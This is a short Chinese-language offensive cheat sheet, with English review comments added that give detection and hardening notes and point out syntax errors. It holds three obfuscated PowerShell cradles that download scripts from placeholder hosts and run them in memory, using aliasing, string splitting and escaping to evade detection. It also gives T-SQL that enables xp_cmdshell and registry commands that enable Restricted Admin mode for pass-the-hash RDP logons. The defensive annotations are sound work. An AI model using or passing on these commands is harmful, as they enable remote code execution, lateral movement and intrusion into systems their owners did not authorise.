
速查表

powershell快速上线

REM Three variants of the same remote download-and-execute cradle: Invoke-Expression is given a
REM throwaway alias (kaspersky / hhh / xz), Net.WebClient.DownloadString fetches a script over
REM HTTP(S), and the alias runs the fetched text in memory. Only the alias name, the string
REM splitting and the cmd.exe escaping differ between the three lines.
REM Detection notes (review):
REM  - PowerShell script block logging (Microsoft-Windows-PowerShell/Operational, event 4104) logs
REM    the string handed to Invoke-Expression, and the downloaded script itself, as their own script
REM    blocks, so hunting on net.webclient / downloadstring / set-alias ... invoke-expression there
REM    is more reliable than matching process command lines.
REM  - In the two piped forms the script reaches powershell.exe on stdin ("powershell -"), so the
REM    powershell.exe process-creation event (Sysmon 1 / Security 4688) carries little; the parent
REM    cmd.exe command line and the 4104 events are where the cradle text appears.
REM  - The caret (^) escapes and the %psmodulepath:~24,10% substring expansion are resolved by
REM    cmd.exe before the child process starts; only the cmd.exe command line matches them literally.
REM The hosts below (xx.xxxx.online, 192.168.1.12, x.x.x.x) are placeholders from the original page.
powershell set-alias -name kaspersky -value Invoke-Expression;"$a1='kaspersky ((new-object net.webclient).downl';$a2='oadstring(''https://xx.xxxx.online/a.ps1''))';$a3=$a1,$a2;kaspersky(-join $a3)"

echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://19’+'2.168.1.1'+'2/payload.ps1') | %psmodulepath:~24,10% -

CMD /C ECHO SET-ALIAS -NAME XZ -VALUE iex;x^z (nEW-oBJECT "NeT.WebClient").D^O^W^N^L^O^A^D^S^T^R^I^N^G('HT'+'Tps://x.x.x.x') | P^O^W^E^R^S^H^E^L^L -

sqlserver_xpcmdshell

-- First statement: checks whether the xp_cmdshell extended stored procedure (xtype 'X') exists in
-- master. The remaining statements enable it through sp_configure ('show advanced options' must be
-- turned on first, and each change needs RECONFIGURE to take effect).
-- NOTE (review): the "#..." text on the first two lines is not T-SQL comment syntax (T-SQL uses
-- "--" or "/* */"); pasted as-is, those lines do not parse. The original reads, in English:
-- "check whether xp_cmdshell is enabled" and "enable xp_cmdshell manually".
-- Detection / hardening notes:
--  * sp_configure changes are written to the SQL Server error log; alert on 'xp_cmdshell' changing
--    from 0 to 1, and on the SQL Server service process spawning cmd.exe.
--  * sp_configure requires the ALTER SETTINGS server permission (held by sysadmin), so reaching this
--    step implies a highly privileged login was already obtained.
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'  #查看xpcmdshell是否开启
#手工打开xpcmdshell
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;

利用hash远程登录管理员账号

REM Sets DisableRestrictedAdmin to 0 under HKLM\System\CurrentControlSet\Control\Lsa (0x0 = Restricted
REM Admin mode enabled), then reads the value back. The original comments read, in English: "RDP logon
REM with a hash requires Restricted Admin Mode", "enable Restricted Admin mode", and "check whether it
REM is enabled; 0x0 means enabled".
REM NOTE (review): "#..." is not cmd comment syntax. As written, the first line is treated as a command
REM name and fails, and the trailing "#..." on the reg add / findstr lines is passed as extra arguments:
REM reg.exe is likely to reject them as invalid syntax, and findstr reads the extra token as a file name
REM instead of the piped reg query output. Put comments on their own REM lines.
REM Detection / hardening notes:
REM  * Restricted Admin mode is a legitimate hardening feature (the RDP client does not send the user's
REM    credentials to the remote host), but the same setting allows an RDP logon with only an NTLM
REM    hash, which is why the page enables it. Monitor writes to this value (Sysmon 13, or registry
REM    auditing event 4657) and treat an unexpected 0 as a pass-the-hash enabler.
REM  * Writing this key needs administrator rights on the target, so the step presumes local admin.
#使用hash远程登录RDP,需要开启"Restricted Admin Mode"
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f #开启Restricted Admin mode
REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin" #查看是否已开启0x0则表示开启